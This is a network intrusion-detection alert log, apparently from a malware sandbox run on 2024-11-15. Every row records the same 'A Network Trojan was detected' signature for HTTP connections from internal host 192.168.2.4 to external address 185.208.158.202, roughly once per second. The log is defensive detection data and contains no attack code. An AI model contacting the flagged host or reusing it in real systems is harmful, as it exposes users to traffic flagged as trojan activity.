2024-11-15T14:13:56.139190+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50369	185.208.158.202	80	TCP
2024-11-15T14:13:57.183444+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50372	185.208.158.202	80	TCP
2024-11-15T14:13:58.238085+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50373	185.208.158.202	80	TCP
2024-11-15T14:13:59.285727+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50374	185.208.158.202	80	TCP
2024-11-15T14:14:00.311949+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50377	185.208.158.202	80	TCP
2024-11-15T14:14:01.360746+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50378	185.208.158.202	80	TCP
2024-11-15T14:14:02.398525+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50380	185.208.158.202	80	TCP
2024-11-15T14:14:03.433188+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50381	185.208.158.202	80	TCP
2024-11-15T14:14:04.476607+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50383	185.208.158.202	80	TCP
2024-11-15T14:14:05.503954+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50385	185.208.158.202	80	TCP
2024-11-15T14:14:06.581792+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50386	185.208.158.202	80	TCP
2024-11-15T14:14:07.624874+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50388	185.208.158.202	80	TCP
2024-11-15T14:14:08.970106+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50389	185.208.158.202	80	TCP
2024-11-15T14:14:10.006389+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50392	185.208.158.202	80	TCP
2024-11-15T14:14:11.048804+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50393	185.208.158.202	80	TCP
2024-11-15T14:14:12.129040+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50395	185.208.158.202	80	TCP
2024-11-15T14:14:13.159067+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50396	185.208.158.202	80	TCP
2024-11-15T14:14:14.191143+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50397	185.208.158.202	80	TCP
2024-11-15T14:14:15.234664+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50399	185.208.158.202	80	TCP
2024-11-15T14:14:16.265507+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50400	185.208.158.202	80	TCP
2024-11-15T14:14:17.297498+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50402	185.208.158.202	80	TCP
2024-11-15T14:14:18.385973+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50403	185.208.158.202	80	TCP
2024-11-15T14:14:19.440542+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50405	185.208.158.202	80	TCP
2024-11-15T14:14:20.489361+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50407	185.208.158.202	80	TCP
2024-11-15T14:14:21.561358+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50408	185.208.158.202	80	TCP
2024-11-15T14:14:22.592532+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50410	185.208.158.202	80	TCP
2024-11-15T14:14:23.661589+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50411	185.208.158.202	80	TCP
2024-11-15T14:14:24.697930+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50413	185.208.158.202	80	TCP
2024-11-15T14:14:25.721830+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50414	185.208.158.202	80	TCP
2024-11-15T14:14:26.755064+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50415	185.208.158.202	80	TCP
2024-11-15T14:14:27.809403+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50417	185.208.158.202	80	TCP
2024-11-15T14:14:28.891512+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50418	185.208.158.202	80	TCP
2024-11-15T14:14:29.955404+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50422	185.208.158.202	80	TCP
2024-11-15T14:14:30.993400+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50423	185.208.158.202	80	TCP
2024-11-15T14:14:32.031991+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50425	185.208.158.202	80	TCP
2024-11-15T14:14:33.290461+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50426	185.208.158.202	80	TCP
2024-11-15T14:14:34.351729+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50427	185.208.158.202	80	TCP
2024-11-15T14:14:35.393083+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50429	185.208.158.202	80	TCP
2024-11-15T14:14:36.431347+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50430	185.208.158.202	80	TCP
2024-11-15T14:14:37.522179+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50432	185.208.158.202	80	TCP
2024-11-15T14:14:38.937917+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50433	185.208.158.202	80	TCP
2024-11-15T14:14:39.989855+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50437	185.208.158.202	80	TCP
2024-11-15T14:14:41.054843+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50438	185.208.158.202	80	TCP
2024-11-15T14:14:42.100907+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50441	185.208.158.202	80	TCP
2024-11-15T14:14:43.500951+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50442	185.208.158.202	80	TCP
2024-11-15T14:14:44.609679+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50444	185.208.158.202	80	TCP
2024-11-15T14:14:45.672065+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50445	185.208.158.202	80	TCP
2024-11-15T14:14:46.775848+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50446	185.208.158.202	80	TCP
2024-11-15T14:14:47.837525+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50448	185.208.158.202	80	TCP
2024-11-15T14:14:50.247076+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50449	185.208.158.202	80	TCP
2024-11-15T14:14:51.284595+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50451	185.208.158.202	80	TCP
2024-11-15T14:14:52.339090+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50454	185.208.158.202	80	TCP
2024-11-15T14:14:53.379193+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50455	185.208.158.202	80	TCP
2024-11-15T14:14:54.418422+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50456	185.208.158.202	80	TCP
2024-11-15T14:14:55.652660+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50458	185.208.158.202	80	TCP
2024-11-15T14:14:56.679675+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50459	185.208.158.202	80	TCP
2024-11-15T14:14:57.708531+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50461	185.208.158.202	80	TCP
2024-11-15T14:14:58.747617+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50462	185.208.158.202	80	TCP
2024-11-15T14:14:59.779522+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50463	185.208.158.202	80	TCP
2024-11-15T14:15:00.814226+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50465	185.208.158.202	80	TCP
2024-11-15T14:15:01.848087+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50467	185.208.158.202	80	TCP
2024-11-15T14:15:02.883163+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50469	185.208.158.202	80	TCP
2024-11-15T14:15:03.927779+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50470	185.208.158.202	80	TCP
2024-11-15T14:15:04.964066+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50473	185.208.158.202	80	TCP
2024-11-15T14:15:06.034462+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50474	185.208.158.202	80	TCP
2024-11-15T14:15:07.490581+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50475	185.208.158.202	80	TCP
2024-11-15T14:15:08.536462+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50477	185.208.158.202	80	TCP
2024-11-15T14:15:09.578171+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50478	185.208.158.202	80	TCP
2024-11-15T14:15:10.602047+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50480	185.208.158.202	80	TCP
2024-11-15T14:15:11.667508+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50482	185.208.158.202	80	TCP
2024-11-15T14:15:12.714483+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50484	185.208.158.202	80	TCP
2024-11-15T14:15:13.757442+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50485	185.208.158.202	80	TCP
2024-11-15T14:15:14.795943+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50486	185.208.158.202	80	TCP
2024-11-15T14:15:15.820095+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50488	185.208.158.202	80	TCP
2024-11-15T14:15:16.863716+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50489	185.208.158.202	80	TCP
2024-11-15T14:15:17.894974+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50491	185.208.158.202	80	TCP
2024-11-15T14:15:18.927912+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50492	185.208.158.202	80	TCP
2024-11-15T14:15:20.709747+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50493	185.208.158.202	80	TCP
2024-11-15T14:15:21.739303+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50496	185.208.158.202	80	TCP
2024-11-15T14:15:22.784426+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50497	185.208.158.202	80	TCP
2024-11-15T14:15:23.826425+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50499	185.208.158.202	80	TCP
2024-11-15T14:15:24.890845+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50500	185.208.158.202	80	TCP
2024-11-15T14:15:25.948117+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50502	185.208.158.202	80	TCP
2024-11-15T14:15:26.991045+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50503	185.208.158.202	80	TCP
2024-11-15T14:15:28.025218+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50504	185.208.158.202	80	TCP
2024-11-15T14:15:29.094358+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50506	185.208.158.202	80	TCP
2024-11-15T14:15:30.132166+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50507	185.208.158.202	80	TCP
2024-11-15T14:15:31.180105+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50509	185.208.158.202	80	TCP
2024-11-15T14:15:32.200911+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50511	185.208.158.202	80	TCP
2024-11-15T14:15:33.242277+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50513	185.208.158.202	80	TCP
2024-11-15T14:15:34.284296+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50514	185.208.158.202	80	TCP
2024-11-15T14:15:35.705136+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50515	185.208.158.202	80	TCP
2024-11-15T14:15:36.746368+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50517	185.208.158.202	80	TCP
2024-11-15T14:15:37.772307+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50518	185.208.158.202	80	TCP
2024-11-15T14:15:38.813289+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50519	185.208.158.202	80	TCP
2024-11-15T14:15:39.887439+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50521	185.208.158.202	80	TCP
2024-11-15T14:15:40.944784+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50522	185.208.158.202	80	TCP
2024-11-15T14:15:42.017256+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50524	185.208.158.202	80	TCP
2024-11-15T14:15:43.075620+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50525	185.208.158.202	80	TCP
2024-11-15T14:15:44.126219+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50527	185.208.158.202	80	TCP
2024-11-15T14:15:45.155514+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50528	185.208.158.202	80	TCP
2024-11-15T14:15:46.217824+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50529	185.208.158.202	80	TCP
2024-11-15T14:15:47.260664+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50531	185.208.158.202	80	TCP
2024-11-15T14:15:48.296099+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50532	185.208.158.202	80	TCP
2024-11-15T14:15:49.318032+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50534	185.208.158.202	80	TCP
2024-11-15T14:15:50.362162+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50535	185.208.158.202	80	TCP
2024-11-15T14:15:51.398246+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50536	185.208.158.202	80	TCP
2024-11-15T14:15:52.436913+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50538	185.208.158.202	80	TCP
2024-11-15T14:15:53.497457+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50539	185.208.158.202	80	TCP
2024-11-15T14:15:54.528644+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50541	185.208.158.202	80	TCP
2024-11-15T14:15:55.579328+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50542	185.208.158.202	80	TCP
2024-11-15T14:15:56.657419+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50544	185.208.158.202	80	TCP
2024-11-15T14:15:57.709286+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50545	185.208.158.202	80	TCP
2024-11-15T14:15:58.759050+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50546	185.208.158.202	80	TCP
2024-11-15T14:15:59.794331+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50548	185.208.158.202	80	TCP
2024-11-15T14:16:00.857797+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50549	185.208.158.202	80	TCP
2024-11-15T14:16:01.905135+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50551	185.208.158.202	80	TCP
2024-11-15T14:16:02.939497+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50552	185.208.158.202	80	TCP
2024-11-15T14:16:03.985230+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50554	185.208.158.202	80	TCP
2024-11-15T14:16:05.031779+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50555	185.208.158.202	80	TCP
2024-11-15T14:16:06.071095+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50556	185.208.158.202	80	TCP
2024-11-15T14:16:07.102507+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50558	185.208.158.202	80	TCP
2024-11-15T14:16:08.153826+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50559	185.208.158.202	80	TCP
2024-11-15T14:16:09.203031+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50561	185.208.158.202	80	TCP
2024-11-15T14:16:10.247450+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50562	185.208.158.202	80	TCP
2024-11-15T14:16:11.280663+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50563	185.208.158.202	80	TCP
2024-11-15T14:16:12.319538+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50566	185.208.158.202	80	TCP
2024-11-15T14:16:13.365655+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50567	185.208.158.202	80	TCP
2024-11-15T14:16:14.441077+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50569	185.208.158.202	80	TCP
2024-11-15T14:16:15.642771+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50572	185.208.158.202	80	TCP
2024-11-15T14:16:16.652145+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50574	185.208.158.202	80	TCP
2024-11-15T14:16:17.681611+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50575	185.208.158.202	80	TCP
2024-11-15T14:16:18.881136+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50576	185.208.158.202	80	TCP
2024-11-15T14:16:19.979122+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50578	185.208.158.202	80	TCP
2024-11-15T14:16:21.004306+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50580	185.208.158.202	80	TCP
2024-11-15T14:16:22.070022+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50582	185.208.158.202	80	TCP
2024-11-15T14:16:23.108264+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50583	185.208.158.202	80	TCP
2024-11-15T14:16:24.189191+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50585	185.208.158.202	80	TCP
2024-11-15T14:16:25.259332+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50586	185.208.158.202	80	TCP
2024-11-15T14:16:26.354095+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50587	185.208.158.202	80	TCP
2024-11-15T14:16:27.382459+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50589	185.208.158.202	80	TCP
2024-11-15T14:16:28.443334+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50590	185.208.158.202	80	TCP
2024-11-15T14:16:29.503584+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50592	185.208.158.202	80	TCP
2024-11-15T14:16:30.534471+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50593	185.208.158.202	80	TCP
2024-11-15T14:16:31.578340+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50594	185.208.158.202	80	TCP
2024-11-15T14:16:32.637436+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50597	185.208.158.202	80	TCP
2024-11-15T14:16:33.717080+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50598	185.208.158.202	80	TCP
2024-11-15T14:16:34.758619+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50600	185.208.158.202	80	TCP
2024-11-15T14:16:35.801030+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50601	185.208.158.202	80	TCP
2024-11-15T14:16:36.830722+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50603	185.208.158.202	80	TCP
2024-11-15T14:16:37.869751+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50604	185.208.158.202	80	TCP
2024-11-15T14:16:39.169247+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50605	185.208.158.202	80	TCP
2024-11-15T14:16:40.198367+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50607	185.208.158.202	80	TCP
2024-11-15T14:16:41.235057+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50608	185.208.158.202	80	TCP
2024-11-15T14:16:42.282888+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50611	185.208.158.202	80	TCP
2024-11-15T14:16:43.329341+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50612	185.208.158.202	80	TCP
2024-11-15T14:16:44.365447+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50614	185.208.158.202	80	TCP
2024-11-15T14:16:45.395935+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50615	185.208.158.202	80	TCP
2024-11-15T14:16:46.427683+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50616	185.208.158.202	80	TCP
2024-11-15T14:16:47.434072+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50618	185.208.158.202	80	TCP
2024-11-15T14:16:48.459495+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50619	185.208.158.202	80	TCP
2024-11-15T14:16:49.500449+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50621	185.208.158.202	80	TCP
2024-11-15T14:16:50.533578+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50622	185.208.158.202	80	TCP
2024-11-15T14:16:51.587959+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50623	185.208.158.202	80	TCP
2024-11-15T14:16:52.642079+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50626	185.208.158.202	80	TCP
2024-11-15T14:16:54.717182+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50627	185.208.158.202	80	TCP
2024-11-15T14:16:55.736163+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50629	185.208.158.202	80	TCP
2024-11-15T14:16:56.766939+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50630	185.208.158.202	80	TCP
2024-11-15T14:16:57.826545+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50632	185.208.158.202	80	TCP
2024-11-15T14:16:58.880353+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50633	185.208.158.202	80	TCP
2024-11-15T14:16:59.910377+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50635	185.208.158.202	80	TCP
2024-11-15T14:17:00.953800+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50636	185.208.158.202	80	TCP
2024-11-15T14:17:01.977000+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50638	185.208.158.202	80	TCP
2024-11-15T14:17:03.021323+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50640	185.208.158.202	80	TCP
2024-11-15T14:17:04.049536+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50641	185.208.158.202	80	TCP
2024-11-15T14:17:05.058249+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50643	185.208.158.202	80	TCP
2024-11-15T14:17:06.078598+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50644	185.208.158.202	80	TCP
2024-11-15T14:17:07.135155+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50645	185.208.158.202	80	TCP
2024-11-15T14:17:08.155448+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50647	185.208.158.202	80	TCP
2024-11-15T14:17:09.166236+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50648	185.208.158.202	80	TCP
2024-11-15T14:17:10.201615+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50650	185.208.158.202	80	TCP
2024-11-15T14:17:11.255924+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50651	185.208.158.202	80	TCP
2024-11-15T14:17:12.318518+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50654	185.208.158.202	80	TCP
2024-11-15T14:17:13.334117+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50655	185.208.158.202	80	TCP
2024-11-15T14:17:14.364238+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50656	185.208.158.202	80	TCP
2024-11-15T14:17:15.421217+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50658	185.208.158.202	80	TCP
2024-11-15T14:17:16.463400+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50659	185.208.158.202	80	TCP
2024-11-15T14:17:17.511361+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50661	185.208.158.202	80	TCP
2024-11-15T14:17:18.517728+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50662	185.208.158.202	80	TCP
2024-11-15T14:17:19.537314+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50663	185.208.158.202	80	TCP
2024-11-15T14:17:20.548935+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50665	185.208.158.202	80	TCP
2024-11-15T14:17:21.597078+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50666	185.208.158.202	80	TCP
2024-11-15T14:17:23.678493+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50669	185.208.158.202	80	TCP
2024-11-15T14:17:24.695362+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50670	185.208.158.202	80	TCP
2024-11-15T14:17:25.765208+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50672	185.208.158.202	80	TCP
2024-11-15T14:17:26.811418+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50673	185.208.158.202	80	TCP
2024-11-15T14:17:27.829288+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50675	185.208.158.202	80	TCP
2024-11-15T14:17:28.903123+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50676	185.208.158.202	80	TCP
2024-11-15T14:17:29.940491+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50677	185.208.158.202	80	TCP
2024-11-15T14:17:31.047583+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50679	185.208.158.202	80	TCP
2024-11-15T14:17:32.070805+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50681	185.208.158.202	80	TCP
2024-11-15T14:17:33.117920+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50683	185.208.158.202	80	TCP
2024-11-15T14:17:34.168336+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50684	185.208.158.202	80	TCP
2024-11-15T14:17:35.225801+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50686	185.208.158.202	80	TCP
2024-11-15T14:17:36.321993+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50687	185.208.158.202	80	TCP
2024-11-15T14:17:37.379479+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50688	185.208.158.202	80	TCP
2024-11-15T14:17:38.384429+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50690	185.208.158.202	80	TCP
2024-11-15T14:17:39.432884+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50691	185.208.158.202	80	TCP
2024-11-15T14:17:40.460494+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50693	185.208.158.202	80	TCP
2024-11-15T14:17:41.478010+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50694	185.208.158.202	80	TCP
2024-11-15T14:17:42.504457+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50696	185.208.158.202	80	TCP
2024-11-15T14:17:43.521022+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50698	185.208.158.202	80	TCP
2024-11-15T14:17:44.631226+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50699	185.208.158.202	80	TCP
2024-11-15T14:17:45.636740+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50701	185.208.158.202	80	TCP
2024-11-15T14:17:46.704973+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50702	185.208.158.202	80	TCP
2024-11-15T14:17:47.753363+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50704	185.208.158.202	80	TCP
2024-11-15T14:17:48.757919+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50705	185.208.158.202	80	TCP
2024-11-15T14:17:49.746878+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50706	185.208.158.202	80	TCP
2024-11-15T14:17:50.758400+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50708	185.208.158.202	80	TCP
2024-11-15T14:17:51.783100+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50709	185.208.158.202	80	TCP
2024-11-15T14:17:53.022900+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50711	185.208.158.202	80	TCP
2024-11-15T14:17:54.056489+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50713	185.208.158.202	80	TCP
2024-11-15T14:17:55.074786+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50714	185.208.158.202	80	TCP
2024-11-15T14:17:56.103528+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50716	185.208.158.202	80	TCP
2024-11-15T14:17:57.160287+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50717	185.208.158.202	80	TCP
2024-11-15T14:17:58.171483+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50719	185.208.158.202	80	TCP
2024-11-15T14:17:59.202553+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50720	185.208.158.202	80	TCP
2024-11-15T14:18:00.206738+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50722	185.208.158.202	80	TCP
2024-11-15T14:18:01.284982+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50723	185.208.158.202	80	TCP
2024-11-15T14:18:02.282557+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50724	185.208.158.202	80	TCP
2024-11-15T14:18:03.305465+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50726	185.208.158.202	80	TCP
2024-11-15T14:18:04.332647+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50727	185.208.158.202	80	TCP
2024-11-15T14:18:05.359090+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50729	185.208.158.202	80	TCP
2024-11-15T14:18:06.408504+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50730	185.208.158.202	80	TCP
2024-11-15T14:18:07.426790+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50731	185.208.158.202	80	TCP
2024-11-15T14:18:08.440609+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50733	185.208.158.202	80	TCP
2024-11-15T14:18:09.484583+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50735	185.208.158.202	80	TCP
2024-11-15T14:18:10.525148+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50737	185.208.158.202	80	TCP
2024-11-15T14:18:11.535780+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50738	185.208.158.202	80	TCP
2024-11-15T14:18:12.544500+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50740	185.208.158.202	80	TCP
2024-11-15T14:18:13.555939+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50742	185.208.158.202	80	TCP
2024-11-15T14:18:14.539462+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50743	185.208.158.202	80	TCP
2024-11-15T14:18:15.541296+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50745	185.208.158.202	80	TCP
2024-11-15T14:18:16.567785+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50746	185.208.158.202	80	TCP
2024-11-15T14:18:17.611601+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50747	185.208.158.202	80	TCP
